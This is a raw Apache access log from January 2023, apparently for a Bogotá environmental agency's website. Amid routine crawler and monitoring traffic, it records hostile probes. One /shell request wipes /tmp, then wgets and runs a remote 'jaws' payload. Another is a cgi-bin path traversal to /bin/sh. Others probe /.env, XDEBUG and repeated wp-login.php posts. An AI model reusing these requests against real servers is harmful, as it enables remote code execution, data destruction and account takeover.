172.22.2.4 - - [10/Jan/2023:03:04:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
216.245.221.92 - - [10/Jan/2023:03:06:43 -0500] "HEAD / HTTP/1.1" 200 -
162.55.175.142 - - [10/Jan/2023:03:07:00 -0500] "GET / HTTP/1.1" 200 319
162.55.175.138 - - [10/Jan/2023:03:07:10 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [10/Jan/2023:03:07:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:03:08:36 -0500] "GET /BLA/boletinlegal/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 404 1018
176.67.99.4 - - [10/Jan/2023:03:09:15 -0500] "GET / HTTP/1.1" 200 319
176.67.99.4 - - [10/Jan/2023:03:09:15 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [10/Jan/2023:03:09:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [10/Jan/2023:03:11:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:03:10:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
201.245.192.253 - - [10/Jan/2023:03:12:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
216.245.221.92 - - [10/Jan/2023:03:16:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:03:15:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:03:17:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:03:16:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55680
201.245.192.253 - - [10/Jan/2023:03:18:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43923
201.245.192.253 - - [10/Jan/2023:03:18:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43967
172.22.2.4 - - [10/Jan/2023:03:21:35 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
216.245.221.92 - - [10/Jan/2023:03:21:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:03:22:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:03:21:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:03:22:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55680
172.22.2.4 - - [10/Jan/2023:03:23:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 40907
216.245.221.92 - - [10/Jan/2023:03:26:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:03:27:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
201.245.192.253 - - [10/Jan/2023:03:28:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43923
201.245.192.253 - - [10/Jan/2023:03:28:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43967
172.22.2.4 - - [10/Jan/2023:03:27:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:03:28:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55680
172.22.2.4 - - [10/Jan/2023:03:30:09 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
172.22.2.4 - - [10/Jan/2023:03:30:33 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1018
172.22.2.4 - - [10/Jan/2023:03:29:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
172.22.2.4 - - [10/Jan/2023:03:30:35 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [10/Jan/2023:03:30:40 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [10/Jan/2023:03:30:45 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [10/Jan/2023:03:31:29 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20SENTENCIA%20C-245%20DE%202004.doc HTTP/1.1" 304 -
216.245.221.92 - - [10/Jan/2023:03:31:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:03:32:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
40.77.167.60 - - [10/Jan/2023:03:33:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RES%202006%201-50/00000003.tif HTTP/1.1" 200 181052
172.22.2.4 - - [10/Jan/2023:03:33:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:03:34:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59035
216.245.221.92 - - [10/Jan/2023:03:36:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:03:37:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
201.245.192.253 - - [10/Jan/2023:03:38:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43923
201.245.192.253 - - [10/Jan/2023:03:38:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43967
74.125.212.74 - - [10/Jan/2023:03:40:38 -0500] "GET /conoce-las-234-empresas-reconocidas-por-su-gestion-ambiental-y-como-participar-en-2023.html HTTP/1.1" 200 957
74.125.212.78 - - [10/Jan/2023:03:40:39 -0500] "GET /conoce-las-234-empresas-reconocidas-por-su-gestion-ambiental-y-como-participar-en-2023.html HTTP/1.1" 200 957
172.22.2.4 - - [10/Jan/2023:03:39:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:03:39:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59035
216.245.221.92 - - [10/Jan/2023:03:41:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:03:42:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:03:46:30 -0500] "GET /BLA/boletinlegal/Circulares/2020/CIRCULAR%20No.%2000019%20DEL%2018%20DE%20DICIEMBRE%20DEL%202020.pdf HTTP/1.1" 304 -
172.22.2.4 - - [10/Jan/2023:03:46:30 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [10/Jan/2023:03:44:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [10/Jan/2023:03:46:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:03:45:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56825
201.245.192.253 - - [10/Jan/2023:03:47:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
143.198.202.60 - - [10/Jan/2023:03:50:45 -0500] "GET /administrator/index.php HTTP/1.1" 404 1035
143.198.202.60 - - [10/Jan/2023:03:50:46 -0500] "GET / HTTP/1.1" 200 319
143.198.202.60 - - [10/Jan/2023:03:50:46 -0500] "GET /.env HTTP/1.1" 404 1035
143.198.202.60 - - [10/Jan/2023:03:50:47 -0500] "GET / HTTP/1.1" 200 319
143.198.202.60 - - [10/Jan/2023:03:50:48 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [10/Jan/2023:03:49:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60277
143.198.202.60 - - [10/Jan/2023:03:51:04 -0500] "GET /administrator/index.php HTTP/1.1" 404 1034
143.198.202.60 - - [10/Jan/2023:03:51:05 -0500] "GET / HTTP/1.1" 200 4720
143.198.202.60 - - [10/Jan/2023:03:51:06 -0500] "GET /.env HTTP/1.1" 404 1034
143.198.202.60 - - [10/Jan/2023:03:51:07 -0500] "GET / HTTP/1.1" 200 4720
143.198.202.60 - - [10/Jan/2023:03:51:08 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [10/Jan/2023:03:51:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:03:50:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:03:52:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:03:51:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58185
172.22.2.4 - - [10/Jan/2023:03:54:28 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [10/Jan/2023:03:54:32 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%206%20del%208%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 996625
143.198.202.60 - - [10/Jan/2023:03:55:01 -0500] "GET /administrator/index.php HTTP/1.1" 404 1032
143.198.202.60 - - [10/Jan/2023:03:55:02 -0500] "GET / HTTP/1.1" 200 319
143.198.202.60 - - [10/Jan/2023:03:55:02 -0500] "GET /.env HTTP/1.1" 404 1032
143.198.202.60 - - [10/Jan/2023:03:55:03 -0500] "GET / HTTP/1.1" 200 319
143.198.202.60 - - [10/Jan/2023:03:55:04 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [10/Jan/2023:03:56:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:03:57:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:03:56:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
185.119.81.99 - - [10/Jan/2023:03:58:42 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.99 - - [10/Jan/2023:03:58:43 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [10/Jan/2023:03:57:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
199.16.157.183 - - [10/Jan/2023:04:01:31 -0500] "-" 408 -
199.16.157.183 - - [10/Jan/2023:04:01:32 -0500] "-" 408 -
216.245.221.92 - - [10/Jan/2023:04:01:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:04:02:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
66.249.73.100 - - [10/Jan/2023:04:03:10 -0500] "-" 408 -
172.22.2.4 - - [10/Jan/2023:04:02:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50495
172.22.2.4 - - [10/Jan/2023:04:02:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.159.177 - - [10/Jan/2023:04:04:35 -0500] "-" 408 -
172.22.2.4 - - [10/Jan/2023:04:03:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45356
216.245.221.92 - - [10/Jan/2023:04:06:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:04:07:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:04:08:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:04:10:43 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [10/Jan/2023:04:09:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52942
216.245.221.92 - - [10/Jan/2023:04:11:43 -0500] "HEAD / HTTP/1.1" 200 -
152.89.196.211 - - [10/Jan/2023:04:11:48 -0500] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 319
172.22.2.4 - - [10/Jan/2023:04:10:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58185
201.245.192.253 - - [10/Jan/2023:04:12:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
64.62.197.129 - - [10/Jan/2023:04:15:18 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [10/Jan/2023:04:14:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:04:14:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55272
216.245.221.92 - - [10/Jan/2023:04:16:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:04:17:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
64.62.197.136 - - [10/Jan/2023:04:17:36 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
207.46.13.62 - - [10/Jan/2023:04:18:22 -0500] "GET /bla/resoluciones/resoluciones%202012/0805.pdf HTTP/1.1" 304 -
201.245.192.253 - - [10/Jan/2023:04:18:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43908
201.245.192.253 - - [10/Jan/2023:04:18:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43803
172.22.2.4 - - [10/Jan/2023:04:19:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [10/Jan/2023:04:21:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:04:22:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:04:20:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
157.55.39.215 - - [10/Jan/2023:04:24:40 -0500] "GET /distrito-declara-alerta-ambiental-por-calidad-del-aire-y-apoyara-extincion-de-incendios-en-la-amazonia.html HTTP/1.1" 200 928
185.119.81.101 - - [10/Jan/2023:04:24:49 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [10/Jan/2023:04:24:50 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
185.119.81.99 - - [10/Jan/2023:04:25:20 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.99 - - [10/Jan/2023:04:25:21 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
172.22.2.4 - - [10/Jan/2023:04:25:39 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%203%20del%2023%20de%20Junio%20de%202011.pdf HTTP/1.1" 304 -
172.22.2.4 - - [10/Jan/2023:04:25:54 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000007%20DEL%2010%20DE%20AGOSTO%20DEL%202021.pdf HTTP/1.1" 304 -
216.245.221.92 - - [10/Jan/2023:04:26:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:04:27:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:04:25:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:04:26:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
201.245.192.253 - - [10/Jan/2023:04:28:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43908
201.245.192.253 - - [10/Jan/2023:04:28:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43803
31.13.127.116 - - [10/Jan/2023:04:30:48 -0500] "GET /images/semana-santa-ramos-policia-7-abril.jpg HTTP/1.1" 200 43922
216.245.221.92 - - [10/Jan/2023:04:31:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:04:32:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:04:31:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:04:32:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
216.245.221.92 - - [10/Jan/2023:04:36:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:04:37:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
201.245.192.253 - - [10/Jan/2023:04:38:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43908
201.245.192.253 - - [10/Jan/2023:04:38:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43803
172.22.2.4 - - [10/Jan/2023:04:37:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:04:38:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55272
216.245.221.92 - - [10/Jan/2023:04:41:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:04:42:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
66.249.73.97 - - [10/Jan/2023:04:42:20 -0500] "-" 408 -
152.89.196.211 - - [10/Jan/2023:04:44:00 -0500] "-" 408 -
172.22.2.4 - - [10/Jan/2023:04:43:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:04:44:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53337
216.245.221.92 - - [10/Jan/2023:04:46:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:04:47:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:04:49:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [10/Jan/2023:04:51:25 -0500] "-" 408 -
172.22.2.4 - - [10/Jan/2023:04:49:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
216.245.221.92 - - [10/Jan/2023:04:51:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:04:52:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
144.24.160.176 - - [10/Jan/2023:04:53:45 -0500] "GET /galeria/galeria/fotos/Humedal-techo1P.jpg HTTP/1.1" 200 33428
144.24.160.176 - - [10/Jan/2023:04:53:55 -0500] "GET /galeria/galeria/fotos/2Humedal-techo2P.jpg HTTP/1.1" 200 11998
144.24.160.176 - - [10/Jan/2023:04:53:59 -0500] "GET /galeria/galeria/fotos/Humedal-techo3P.jpg HTTP/1.1" 200 8516
144.24.160.176 - - [10/Jan/2023:04:54:07 -0500] "GET /galeria/galeria/fotos/Humedal-techo4P.jpg HTTP/1.1" 200 11324
172.22.2.4 - - [10/Jan/2023:04:54:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [10/Jan/2023:04:56:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:04:57:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:04:57:18 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-693-12.docx HTTP/1.1" 304 -
172.22.2.4 - - [10/Jan/2023:04:55:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
66.249.73.127 - - [10/Jan/2023:04:58:37 -0500] "-" 408 -
157.55.39.180 - - [10/Jan/2023:05:01:22 -0500] "GET /BLA/boletinlegal/Directivas/2015/Directiva%20No.%2001%20del%2014%20de%20Enero%20de%202015.pdf HTTP/1.1" 304 -
216.245.221.92 - - [10/Jan/2023:05:01:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:05:02:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
152.89.196.211 - - [10/Jan/2023:05:02:25 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [10/Jan/2023:05:00:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:05:01:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
173.252.95.14 - - [10/Jan/2023:05:04:42 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
119.36.163.2 - - [10/Jan/2023:05:05:20 -0500] "GET /portaldeninos/wp-content/uploads/2020/06/mapa-humedales-de-bogot%C3%A1-1.jpg HTTP/1.1" 200 1170768
216.245.221.92 - - [10/Jan/2023:05:06:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:05:07:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:05:06:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
168.119.253.32 - - [10/Jan/2023:05:08:42 -0500] "GET / HTTP/1.1" 200 319
168.119.253.13 - - [10/Jan/2023:05:08:53 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [10/Jan/2023:05:07:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59035
172.22.2.4 - - [10/Jan/2023:05:10:42 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%2007%20del%2028%20de%20Abril%20de%202017.pdf HTTP/1.1" 304 -
216.245.221.92 - - [10/Jan/2023:05:11:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:05:12:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:05:12:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:05:13:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
216.245.221.92 - - [10/Jan/2023:05:16:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:05:17:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
40.77.167.60 - - [10/Jan/2023:05:18:51 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12500
201.245.192.253 - - [10/Jan/2023:05:18:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43917
201.245.192.253 - - [10/Jan/2023:05:18:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43949
172.22.2.4 - - [10/Jan/2023:05:18:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jan/2023:05:19:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
216.245.221.92 - - [10/Jan/2023:05:21:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:05:22:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
66.249.73.97 - - [10/Jan/2023:05:22:59 -0500] "-" 408 -
185.119.81.106 - - [10/Jan/2023:05:25:01 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.106 - - [10/Jan/2023:05:25:02 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [10/Jan/2023:05:24:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
193.35.18.206 - - [10/Jan/2023:05:26:19 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+193.47.61.42/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
172.22.2.4 - - [10/Jan/2023:05:24:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
216.245.221.92 - - [10/Jan/2023:05:26:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:05:27:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
201.245.192.253 - - [10/Jan/2023:05:28:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43917
201.245.192.253 - - [10/Jan/2023:05:28:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43949
172.22.2.4 - - [10/Jan/2023:05:28:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62423
172.22.2.4 - - [10/Jan/2023:05:29:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [10/Jan/2023:05:31:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:05:32:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:05:30:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58185
66.249.73.127 - - [10/Jan/2023:05:32:39 -0500] "-" 408 -
138.201.157.89 - - [10/Jan/2023:05:36:39 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [10/Jan/2023:05:36:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:05:37:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [10/Jan/2023:05:35:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
185.119.81.101 - - [10/Jan/2023:05:37:59 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [10/Jan/2023:05:38:00 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [10/Jan/2023:05:36:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
201.245.192.253 - - [10/Jan/2023:05:38:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43917
201.245.192.253 - - [10/Jan/2023:05:38:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43949
173.252.127.6 - - [10/Jan/2023:05:41:12 -0500] "GET /alexandra-neuto-una-mujer-que-promueve-la-seguridad-alimentaria-y-el-tejido-social-a-traves-de-huertas.html HTTP/1.1" 206 1075
66.249.73.127 - - [10/Jan/2023:05:41:12 -0500] "-" 408 -
216.245.221.92 - - [10/Jan/2023:05:41:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:05:42:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
152.89.196.211 - - [10/Jan/2023:05:42:20 -0500] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 945
172.22.2.4 - - [10/Jan/2023:05:41:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
181.61.206.84 - - [10/Jan/2023:05:43:26 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
181.61.206.84 - - [10/Jan/2023:05:43:42 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
181.61.206.84 - - [10/Jan/2023:05:43:47 -0500] "POST /appsia/controlador HTTP/1.1" 200 7783
181.61.206.84 - - [10/Jan/2023:05:44:06 -0500] "POST /appsia/controlador HTTP/1.1" 200 6648
172.22.2.4 - - [10/Jan/2023:05:42:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
181.61.206.84 - - [10/Jan/2023:05:44:07 -0500] "POST /appsia/controlador HTTP/1.1" 200 8742
181.61.206.84 - - [10/Jan/2023:05:44:10 -0500] "POST /appsia/controlador HTTP/1.1" 200 75554
181.61.206.84 - - [10/Jan/2023:05:44:45 -0500] "POST /appsia/controlador HTTP/1.1" 200 7783
181.61.206.84 - - [10/Jan/2023:05:44:51 -0500] "POST /appsia/controlador HTTP/1.1" 200 5242
157.55.39.201 - - [10/Jan/2023:05:44:52 -0500] "GET /BLA/resoluciones/AUTOS%202022/6009.pdf HTTP/1.1" 304 -
216.245.221.92 - - [10/Jan/2023:05:46:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:05:47:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
66.249.73.127 - - [10/Jan/2023:05:48:27 -0500] "-" 408 -
172.22.2.4 - - [10/Jan/2023:05:47:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.107.17 - - [10/Jan/2023:05:49:33 -0500] "GET /images/Aire%20Reyes%20(1)%20(1).jpeg HTTP/1.1" 200 59709
172.22.2.4 - - [10/Jan/2023:05:48:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53337
168.119.49.52 - - [10/Jan/2023:05:49:57 -0500] "GET / HTTP/1.1" 200 319
168.119.52.80 - - [10/Jan/2023:05:50:06 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [10/Jan/2023:05:51:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [10/Jan/2023:05:52:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
185.119.81.106 - - [10/Jan/2023:05:52:16 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.106 - - [10/Jan/2023:05:52:17 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
